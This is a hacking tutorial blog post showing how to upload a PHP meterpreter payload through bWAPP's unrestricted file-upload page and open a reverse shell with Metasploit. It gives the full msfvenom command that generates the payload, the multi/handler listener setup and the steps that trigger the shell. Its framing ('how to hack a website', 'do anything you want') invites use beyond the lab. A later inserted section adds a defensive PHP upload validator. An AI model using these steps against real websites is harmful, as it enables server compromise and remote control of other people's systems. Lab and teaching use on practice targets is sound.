Metasploit (reverse shell from website)

In this post I’ll be teaching you all how to hack a website by uploading a php file and getting a reverse shell from it using Metasploit!

I’ll be performing this attack on Kali Linux against an intentionally vulnerable application, bWAPP (buggy web application)!

For downloading and setting up bWAPP on your Kali Machine, check out the article below for the entire procedure :-

https://www.kalilinux.in/2020/02/bwapp-in-kali-linux-2020.html

Once you are done with the complete setup, we are set to HACK IT !!!

We are going to create a php file containing a meterpreter payload, upload it on the site... and then get a reverse shell using Metasploit.

Let's Begin

Open up your Kali terminal and enter the below commands if you have uploaded your bWAPP on the apache server :-

sudo service apache2 start
sudo service mysql start

Then head to your browser and navigate to “localhost/bWAPP/login.php”.

Then select unrestricted file upload and hit the HACK button as shown above !

You will get a browse and upload button as shown above.

Now we need to create a payload using msfvenom to upload here (which is a php file in this case)

Enter the following command to create the desired php file payload :-

sudo msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.108 lport=4444 -f raw > /home/danin/Desktop/daninhack.php

Here,
   -p selects the payload
   lhost is the attacker's ip address (your ip address)
   lport is the port you want to listen on
   -f sets the output format (raw in this case)

Since our payload has been created, head to the website and hit the browse button, and upload the php file just created (in my case it’s daninhack.php) as shown below :

Now hit the upload button and the file will be uploaded !

Then we need to set up the listener in Metasploit

Enter the following commands in msfconsole :-

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.108
exploit

Now the Final step!!!

Head back to the website where you uploaded the php file and click on the button highlighted below :

Now when you look at your terminal, you have got a METERPRETER SHELL !!!

BOOOOM !!! ⚡⚡⚡ You hacked it !

Now you can do anything you want to with the meterpreter shell, type for all the available options and have fun !!

That’s why it is important that websites don’t allow a user to upload a file with any extension; it should be limited as per the requirement!

But daNiN is there for you 😉 who will also teach you to bypass these restrictions where you can’t upload files with other extensions (since some websites allow only .jpg and .pdf files to be uploaded)
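
One way to enforce that limit on the server side, as an added example (not code from bWAPP or from this post): the check below accepts only .jpg and .pdf uploads, verifies that the file content matches the claimed type, and replaces the client's file name with a random one. The names safe_upload_name, ALLOWED_TYPES and MAX_BYTES, the size limit and the sample files are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: extension => bytes the file content must start with.
const ALLOWED_TYPES = [
    'jpg'  => "\xFF\xD8\xFF",
    'jpeg' => "\xFF\xD8\xFF",
    'pdf'  => '%PDF-',
];
const MAX_BYTES = 2 * 1024 * 1024; // hypothetical size limit (2 MiB)

// Returns a server-generated file name if the upload is acceptable, else null.
// $tmpPath is where the server stored the upload; $clientName is untrusted input.
function safe_upload_name(string $tmpPath, string $clientName): ?string
{
    // Only the final extension counts, compared case-insensitively.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null; // .php, .phtml, no extension, ...
    }
    $size = filesize($tmpPath);
    if ($size === false || $size === 0 || $size > MAX_BYTES) {
        return null;
    }
    // The content must match the claimed type, not just the name.
    $magic = ALLOWED_TYPES[$ext];
    $head = (string) file_get_contents($tmpPath, false, null, 0, strlen($magic));
    if ($head !== $magic) {
        return null;
    }
    // Never reuse the client's name: no path tricks, no double extensions.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample uploads for the demonstration (not files from the post).
$samples = [
    'daninhack.php' => '<?php /* script */ ?>',
    'photo.jpg'     => "\xFF\xD8\xFF\xE0" . str_repeat("\0", 16),
    'fake.jpg'      => '<?php /* script renamed to .jpg */ ?>',
    'report.PDF'    => "%PDF-1.7\n",
];
foreach ($samples as $name => $bytes) {
    $tmp = tempnam(sys_get_temp_dir(), 'upl');
    file_put_contents($tmp, $bytes);
    $stored = safe_upload_name($tmp, $name);
    echo str_pad($name, 16), $stored === null ? 'REJECTED' : "stored as $stored", "\n";
    unlink($tmp);
}
```

A leading-bytes check does not stop a file that starts like an image and carries script further in, so accepted files should also be stored outside the web root or in a directory where the server does not execute PHP.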

STAY TUNED !!!


If you face any kind of issue or need some help with its additional features, feel free to leave a comment or connect with me directly on my Instagram handle, my mail or my WhatsApp group... details of which are mentioned on my home page 🤗

daNiN hacking Tutorials